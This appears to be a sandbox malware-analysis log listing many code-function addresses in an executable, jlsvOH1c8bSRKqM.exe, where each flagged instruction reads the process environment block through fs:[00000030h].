            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184E10E mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184E10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184E10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184E10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01860115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184A118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184A118 mov eax, dword ptr fs:[00000030h] (3 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01834144 mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01834144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01834144 mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01838158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01874164 mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0179A197 mov eax, dword ptr fs:[00000030h] (3 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017E0185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017CC073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017A2050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_018380A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_018660B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_018660B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0179A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0179C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_018220DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_018260E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017BE016 mov eax, dword ptr fs:[00000030h] (4 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01824000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01842000 mov eax, dword ptr fs:[00000030h] (8 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0179C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017E20F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017A80E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0179A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01836030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01826050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017980A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017A208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_018263C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0185C3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_018443D4 mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184E3DB mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184E3DB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184E3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0179C310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017C0310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017DA30B mov eax, dword ptr fs:[00000030h] (3 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017D63FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017BE3F0 mov eax, dword ptr fs:[00000030h] (3 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017B03E9 mov eax, dword ptr fs:[00000030h] (8 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01878324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01878324 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01878324 mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017AA3C0 mov eax, dword ptr fs:[00000030h] (6 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017A83C0 mov eax, dword ptr fs:[00000030h] (4 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0187634F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186A352 mov eax, dword ptr fs:[00000030h]8_2_0186A352
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01848350 mov ecx, dword ptr fs:[00000030h]8_2_01848350
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov eax, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov eax, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov eax, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov ecx, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov eax, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov eax, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01798397 mov eax, dword ptr fs:[00000030h]8_2_01798397
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01798397 mov eax, dword ptr fs:[00000030h]8_2_01798397
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01798397 mov eax, dword ptr fs:[00000030h]8_2_01798397
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E388 mov eax, dword ptr fs:[00000030h]8_2_0179E388
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E388 mov eax, dword ptr fs:[00000030h]8_2_0179E388
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E388 mov eax, dword ptr fs:[00000030h]8_2_0179E388
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C438F mov eax, dword ptr fs:[00000030h]8_2_017C438F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C438F mov eax, dword ptr fs:[00000030h]8_2_017C438F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184437C mov eax, dword ptr fs:[00000030h]8_2_0184437C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01820283 mov eax, dword ptr fs:[00000030h]8_2_01820283
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01820283 mov eax, dword ptr fs:[00000030h]8_2_01820283
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01820283 mov eax, dword ptr fs:[00000030h]8_2_01820283
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179826B mov eax, dword ptr fs:[00000030h]8_2_0179826B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A4260 mov eax, dword ptr fs:[00000030h]8_2_017A4260
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A4260 mov eax, dword ptr fs:[00000030h]8_2_017A4260
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A4260 mov eax, dword ptr fs:[00000030h]8_2_017A4260
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov eax, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov ecx, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov eax, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov eax, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov eax, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov eax, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A6259 mov eax, dword ptr fs:[00000030h]8_2_017A6259
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179A250 mov eax, dword ptr fs:[00000030h]8_2_0179A250
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179823B mov eax, dword ptr fs:[00000030h]8_2_0179823B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018762D6 mov eax, dword ptr fs:[00000030h]8_2_018762D6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B02E1 mov eax, dword ptr fs:[00000030h]8_2_017B02E1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B02E1 mov eax, dword ptr fs:[00000030h]8_2_017B02E1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B02E1 mov eax, dword ptr fs:[00000030h]8_2_017B02E1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA2C3 mov eax, dword ptr fs:[00000030h]8_2_017AA2C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA2C3 mov eax, dword ptr fs:[00000030h]8_2_017AA2C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA2C3 mov eax, dword ptr fs:[00000030h]8_2_017AA2C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA2C3 mov eax, dword ptr fs:[00000030h]8_2_017AA2C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA2C3 mov eax, dword ptr fs:[00000030h]8_2_017AA2C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01828243 mov eax, dword ptr fs:[00000030h]8_2_01828243
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01828243 mov ecx, dword ptr fs:[00000030h]8_2_01828243
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185A250 mov eax, dword ptr fs:[00000030h]8_2_0185A250
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185A250 mov eax, dword ptr fs:[00000030h]8_2_0185A250
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0187625D mov eax, dword ptr fs:[00000030h]8_2_0187625D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B02A0 mov eax, dword ptr fs:[00000030h]8_2_017B02A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B02A0 mov eax, dword ptr fs:[00000030h]8_2_017B02A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE284 mov eax, dword ptr fs:[00000030h]8_2_017DE284
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE284 mov eax, dword ptr fs:[00000030h]8_2_017DE284
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D656A mov eax, dword ptr fs:[00000030h]8_2_017D656A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D656A mov eax, dword ptr fs:[00000030h]8_2_017D656A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D656A mov eax, dword ptr fs:[00000030h]8_2_017D656A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018205A7 mov eax, dword ptr fs:[00000030h]8_2_018205A7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018205A7 mov eax, dword ptr fs:[00000030h]8_2_018205A7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018205A7 mov eax, dword ptr fs:[00000030h]8_2_018205A7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A8550 mov eax, dword ptr fs:[00000030h]8_2_017A8550
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A8550 mov eax, dword ptr fs:[00000030h]8_2_017A8550
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE53E mov eax, dword ptr fs:[00000030h]8_2_017CE53E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE53E mov eax, dword ptr fs:[00000030h]8_2_017CE53E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE53E mov eax, dword ptr fs:[00000030h]8_2_017CE53E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE53E mov eax, dword ptr fs:[00000030h]8_2_017CE53E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE53E mov eax, dword ptr fs:[00000030h]8_2_017CE53E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01836500 mov eax, dword ptr fs:[00000030h]8_2_01836500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DC5ED mov eax, dword ptr fs:[00000030h]8_2_017DC5ED
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DC5ED mov eax, dword ptr fs:[00000030h]8_2_017DC5ED
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A25E0 mov eax, dword ptr fs:[00000030h]8_2_017A25E0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A65D0 mov eax, dword ptr fs:[00000030h]8_2_017A65D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA5D0 mov eax, dword ptr fs:[00000030h]8_2_017DA5D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA5D0 mov eax, dword ptr fs:[00000030h]8_2_017DA5D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE5CF mov eax, dword ptr fs:[00000030h]8_2_017DE5CF
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE5CF mov eax, dword ptr fs:[00000030h]8_2_017DE5CF
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C45B1 mov eax, dword ptr fs:[00000030h]8_2_017C45B1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C45B1 mov eax, dword ptr fs:[00000030h]8_2_017C45B1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE59C mov eax, dword ptr fs:[00000030h]8_2_017DE59C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D4588 mov eax, dword ptr fs:[00000030h]8_2_017D4588
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A2582 mov eax, dword ptr fs:[00000030h]8_2_017A2582
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A2582 mov ecx, dword ptr fs:[00000030h]8_2_017A2582
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CA470 mov eax, dword ptr fs:[00000030h]8_2_017CA470
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CA470 mov eax, dword ptr fs:[00000030h]8_2_017CA470
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CA470 mov eax, dword ptr fs:[00000030h]8_2_017CA470
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185A49A mov eax, dword ptr fs:[00000030h]8_2_0185A49A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179645D mov eax, dword ptr fs:[00000030h]8_2_0179645D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C245A mov eax, dword ptr fs:[00000030h]8_2_017C245A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182A4B0 mov eax, dword ptr fs:[00000030h]8_2_0182A4B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E420 mov eax, dword ptr fs:[00000030h]8_2_0179E420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E420 mov eax, dword ptr fs:[00000030h]8_2_0179E420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E420 mov eax, dword ptr fs:[00000030h]8_2_0179E420
